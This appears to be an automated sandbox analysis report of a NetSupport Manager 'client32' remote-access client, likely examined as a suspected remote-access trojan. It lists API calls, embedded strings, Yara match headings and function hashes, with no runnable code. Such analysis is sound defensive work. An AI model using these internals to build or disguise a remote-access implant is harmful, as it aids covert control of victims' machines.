                                                                                                                                        • _free.LIBCMT ref: 688F6BA2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library_free$AddressFreeLoadProcwsprintf
                                                                                                                                        • String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
                                                                                                                                        • API String ID: 3641295650-227718810
                                                                                                                                        • Opcode ID: 2f09ae26c82d8b9e88b98911f9d4c5b76b532e6487f8d598db5cc9b9c432ec87
                                                                                                                                        • Instruction ID: 102c9458aa23025adb650e34eca4ace05f6362fafded5e2fc6255d3994d47d5d
                                                                                                                                        • Opcode Fuzzy Hash: 2f09ae26c82d8b9e88b98911f9d4c5b76b532e6487f8d598db5cc9b9c432ec87
                                                                                                                                        • Instruction Fuzzy Hash: 6F414271D0412E9BDB24CF68CD81BEEB7B8AB55304F4085E9E91DA7600EB709E859F90
                                                                                                                                        APIs
                                                                                                                                        • DeleteCriticalSection.KERNEL32(?,27CEFB69,?,?,?,?,?,6892F1E8,000000FF), ref: 689103CA
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,000000FF), ref: 68910415
                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,000000FF), ref: 6891043E
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,000000FF), ref: 68910472
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,000000FF), ref: 68910480
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,000000FF), ref: 6891048D
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893D004,?,?,?,000000FF), ref: 689104CE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CloseHandle$DeleteEnterEventLeaveObjectSingleWait
                                                                                                                                        • String ID: Refcount.cpp$idata->Q.size () == 0
                                                                                                                                        • API String ID: 2474944948-1089602151
                                                                                                                                        • Opcode ID: 177109e02c6470fc712c7bce32ae8987bb768c65380fa6a286ca2c8b3101410d
                                                                                                                                        • Instruction ID: 84ffcbad33d7a7cd5e05bf696c80f883c5b188dbac01ce221a9d2893809e554e
                                                                                                                                        • Opcode Fuzzy Hash: 177109e02c6470fc712c7bce32ae8987bb768c65380fa6a286ca2c8b3101410d
                                                                                                                                        • Instruction Fuzzy Hash: BF419275A0CB28EFCB34DF64D9C592E77A8FB5A318B40062DE55A93780E731E800CB95
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 688F97D4
                                                                                                                                        • wsprintfA.USER32 ref: 688F97F3
                                                                                                                                        • OutputDebugStringA.KERNEL32(?), ref: 688F9803
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 688F982D
                                                                                                                                        • SetEvent.KERNEL32(00000310), ref: 688F98A5
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688F98B0
                                                                                                                                        Strings
                                                                                                                                        • currentThreadId == sv.recv_thread_id, xrefs: 688F981B
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 688F9816
                                                                                                                                        • HTCTL32: FAULT in CacheRecvFDs() - currentThreadId: %x, sv.recv_thread_id: %x, xrefs: 688F97ED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CurrentDebugEnterEventLeaveOutputStringThreadwsprintf
                                                                                                                                        • String ID: HTCTL32: FAULT in CacheRecvFDs() - currentThreadId: %x, sv.recv_thread_id: %x$currentThreadId == sv.recv_thread_id$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                        • API String ID: 229818198-630143122
                                                                                                                                        • Opcode ID: aa4de58b55c4c489c04ffee154a5d38c570dfa42ebc57bb3cc1d7ceae01920a0
                                                                                                                                        • Instruction ID: 456294bca59f7b6e0cadd86b781028c7f18f0a6a17f477acb7693f052e7f1316
                                                                                                                                        • Opcode Fuzzy Hash: aa4de58b55c4c489c04ffee154a5d38c570dfa42ebc57bb3cc1d7ceae01920a0
                                                                                                                                        • Instruction Fuzzy Hash: FB21CF7190C920EFDF34EF68CC54AAD77F4EB8A345F814568E80AE3640DB309941CBA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 2168136238-4289949731
                                                                                                                                        • Opcode ID: 7d942799b058f433e95c9a2c6564bd831fc5c701781dc2b3e7a22008f99e973f
                                                                                                                                        • Instruction ID: 085a7b3aca03725785034b7472008763ebebb608879a578e9fccad3683b910d8
                                                                                                                                        • Opcode Fuzzy Hash: 7d942799b058f433e95c9a2c6564bd831fc5c701781dc2b3e7a22008f99e973f
                                                                                                                                        • Instruction Fuzzy Hash: 4E51D7327141059BD724CE1DD880A6FB3EBEBC5714BA08A2EE895CB385EB70DC518791
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6890CE20
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 6890CEA7
                                                                                                                                        • _memmove.LIBCMT ref: 6890CECB
                                                                                                                                        • _memmove.LIBCMT ref: 6890CF05
                                                                                                                                        • _memmove.LIBCMT ref: 6890CF21
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890CF6B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890CF80
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: deque<T> too long
                                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                                        • Opcode ID: fe1e7a24f15218788d1fabe62cbabcda65a584b34750cc04b3d1b2dcb37a28ac
                                                                                                                                        • Instruction ID: 5f23da67c9c30f50b397e482afb79f99f3e52130539e089ec17fbd5d4d6a5d8e
                                                                                                                                        • Opcode Fuzzy Hash: fe1e7a24f15218788d1fabe62cbabcda65a584b34750cc04b3d1b2dcb37a28ac
                                                                                                                                        • Instruction Fuzzy Hash: FD41DB72E04105ABDB04CE6CCC81AAEB7B9EFD4218F59866CD919D7344E734EE01C7A1
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688F3EB0
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 688F3F39
                                                                                                                                        • _memmove.LIBCMT ref: 688F3F5D
                                                                                                                                        • _memmove.LIBCMT ref: 688F3F97
                                                                                                                                        • _memmove.LIBCMT ref: 688F3FB3
                                                                                                                                        • std::exception::exception.LIBCMT ref: 688F3FFD
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 688F4012
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: deque<T> too long
                                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                                        • Opcode ID: 7690ffd04ff2ee4cd3e99d8b1d76377d35e2bc08d85cca9dd1b34a561d9e7919
                                                                                                                                        • Instruction ID: c112131864b3bab94c79ec1318e8555293c1c8dc4085821b4137e6c575e45291
                                                                                                                                        • Opcode Fuzzy Hash: 7690ffd04ff2ee4cd3e99d8b1d76377d35e2bc08d85cca9dd1b34a561d9e7919
                                                                                                                                        • Instruction Fuzzy Hash: 7841D672E04108ABDB04CF68CC81AAEB7B6EF90254F598668EC18D7744E735EE018B91
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6890A6E0
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 6890A76A
                                                                                                                                        • _memmove.LIBCMT ref: 6890A78E
                                                                                                                                        • _memmove.LIBCMT ref: 6890A7C8
                                                                                                                                        • _memmove.LIBCMT ref: 6890A7E4
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890A82E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890A843
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: deque<T> too long
                                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                                        • Opcode ID: d90457c4577d6facbe999a04418f1f34ef87c3c249a09223b89f4ee29c65a279
                                                                                                                                        • Instruction ID: 19f1d9001287e65247e368b71f71878642f12829822b6e705c2eacccf62ad87d
                                                                                                                                        • Opcode Fuzzy Hash: d90457c4577d6facbe999a04418f1f34ef87c3c249a09223b89f4ee29c65a279
                                                                                                                                        • Instruction Fuzzy Hash: 4C41C276E04108AFDB14CE6CCC81AAEB7FAAFD0214B59C268D819E7305E634EA4187D0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: $CMD=ENCD$DATA=$ES=%d$body$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 110051CE
                                                                                                                                        • _memset.LIBCMT ref: 110051F0
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 11005204
                                                                                                                                        • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
                                                                                                                                        • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
                                                                                                                                        • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
                                                                                                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(6893CF98,27CEFB69), ref: 68910559
                                                                                                                                        • std::exception::exception.LIBCMT ref: 689105BB
                                                                                                                                          • Part of subcall function 6891400A: std::exception::_Copy_str.LIBCMT ref: 68914025
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 689105D0
                                                                                                                                          • Part of subcall function 689142DF: RaiseException.KERNEL32(?,?,688F439C,?,?,?,?,?,688F439C,?,68936630,?,00000000), ref: 68914321
                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000), ref: 689105E1
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893CF98), ref: 689105FD
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893CF98,?,00000001), ref: 68910653
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        • API ID: CriticalSection$Initialize$Copy_strEnterExceptionException@8LeaveRaiseThrowstd::exception::_std::exception::exception
                                                                                                                                        • String ID: Refcount.cpp$p < ep
                                                                                                                                        APIs
                                                                                                                                        • UnDecorator::getArgumentList.LIBCMT ref: 68928653
                                                                                                                                          • Part of subcall function 689281EE: Replicator::operator[].LIBCMT ref: 68928271
                                                                                                                                          • Part of subcall function 689281EE: DName::operator+=.LIBCMT ref: 68928279
                                                                                                                                        • DName::operator+.LIBCMT ref: 689286AC
                                                                                                                                        • DName::DName.LIBCMT ref: 68928704
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                        • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,?), ref: 688F5F77
                                                                                                                                        • wsprintfA.USER32 ref: 688F5FB2
                                                                                                                                        • MessageBoxA.USER32(00000000,?,NetSupport,00000004), ref: 688F5FC7
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 688F5FFF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        • API ID: MessageSleepVersionwsprintf
                                                                                                                                        • String ID: *LineSpeed$Limit transmission speed to %d bps?$NetSupport$_Debug
                                                                                                                                        APIs
                                                                                                                                        • UnDecorator::UScore.LIBCMT ref: 68929FD1
                                                                                                                                        • DName::DName.LIBCMT ref: 68929FDD
                                                                                                                                          • Part of subcall function 68927CA8: DName::doPchar.LIBCMT ref: 68927CD9
                                                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 6892A01C
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A026
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A035
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A041
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892A04E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                        • String ID: void
                                                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                                                        • Opcode ID: ce1dfee06bf85fcd9f6e97b673d7b7bbf9ac4e186a94ad92e676d2c944abae46
                                                                                                                                        • Instruction ID: b83c8532d89a66c40c4aac53131ca458d8790d6c37d35909e6684394a2b52a5b
                                                                                                                                        • Opcode Fuzzy Hash: ce1dfee06bf85fcd9f6e97b673d7b7bbf9ac4e186a94ad92e676d2c944abae46
                                                                                                                                        • Instruction Fuzzy Hash: 7C110275964204EFD704DF64C869FBD7BF4AB12318F844095D012BB2EADB30DA45CB41
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 6890141D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901678
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689016C8
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901740
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6890175B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterException@8LeaveThrow_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: END_REC$MORE$RESULT$b
                                                                                                                                        • API String ID: 285166177-3141901015
                                                                                                                                        • Opcode ID: e0da5a95388461f450fe7d203fde4387b84e12d65de56304b3fa6604affedf5f
                                                                                                                                        • Instruction ID: e073b3ae562925e3c8543367316c615b96816d41e299f1c0dea11afa138fb55e
                                                                                                                                        • Opcode Fuzzy Hash: e0da5a95388461f450fe7d203fde4387b84e12d65de56304b3fa6604affedf5f
                                                                                                                                        • Instruction Fuzzy Hash: B68152B5D053699FDF20DFE89C40AFE76B4AF55308F84056EE44AA6201E7318B48CB96
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 6890141D
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901678
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689016C8
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 689016FB
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901712
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                                        • String ID: END_REC$MORE$RESULT$b
                                                                                                                                        • API String ID: 920729587-3141901015
                                                                                                                                        • Opcode ID: e5593658caf6fd5a32a498f24b721f9bc42f231c79fb67b9761a20c8ba02ac6c
                                                                                                                                        • Instruction ID: 1ebb101e1c312b0e0e1a9e80f8f8d8b2e758aa9b37b9c2d0804ee03e68eecc1f
                                                                                                                                        • Opcode Fuzzy Hash: e5593658caf6fd5a32a498f24b721f9bc42f231c79fb67b9761a20c8ba02ac6c
                                                                                                                                        • Instruction Fuzzy Hash: 3E8152B5D053699FDF20DFE89C40AFE76B4AF55308F84056EE44AA6201E7318B48CB96
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F6DFD
                                                                                                                                        • #16.WSOCK32(688FA730,?,00000001,00000000,?,688FA730,?,00002000,,?,688FACF4,00000000,00000000,?,?,00000010), ref: 688F6E4C
                                                                                                                                        • WSASetLastError.WSOCK32(00002747,?,688FA730,?,00002000,,?,688FACF4,00000000,00000000,?,?,00000010,00000002,00000001,00000000), ref: 688F6F25
                                                                                                                                        • WSASetLastError.WSOCK32(00002745,688FA730,?,00000001,00000000,?,688FA730,?,00002000,,?,688FACF4,00000000,00000000,?,?), ref: 688F6F36
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_memset
                                                                                                                                        • String ID: $Content-Length:$HTTP/
                                                                                                                                        • API String ID: 536390146-1146010681
                                                                                                                                        • Opcode ID: 77fb3e30d3baf8ac8cafbb510605516fbaa3fc486063d401d4ef769257bf60b0
                                                                                                                                        • Instruction ID: c1cc47273c1c4216bb98ebc176cb3232d4de4709d00da6bd2f063310d427d945
                                                                                                                                        • Opcode Fuzzy Hash: 77fb3e30d3baf8ac8cafbb510605516fbaa3fc486063d401d4ef769257bf60b0
                                                                                                                                        • Instruction Fuzzy Hash: 07314C67B0C3066BEB01DA64DC59BAB32688F62388FD00A38FE6487541FB31D10789A1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68910D40: LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,68910F2B,27CEFB69,00000000,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D48
                                                                                                                                          • Part of subcall function 68910D40: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 68910D5B
                                                                                                                                          • Part of subcall function 68910D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6893CB4C,?,?,6892F278,000000FF,?,688FAE0A,?,00000000,?,00000080), ref: 68910D76
                                                                                                                                          • Part of subcall function 68910D40: _free.LIBCMT ref: 68910D84
                                                                                                                                          • Part of subcall function 68910D40: _malloc.LIBCMT ref: 68910D8C
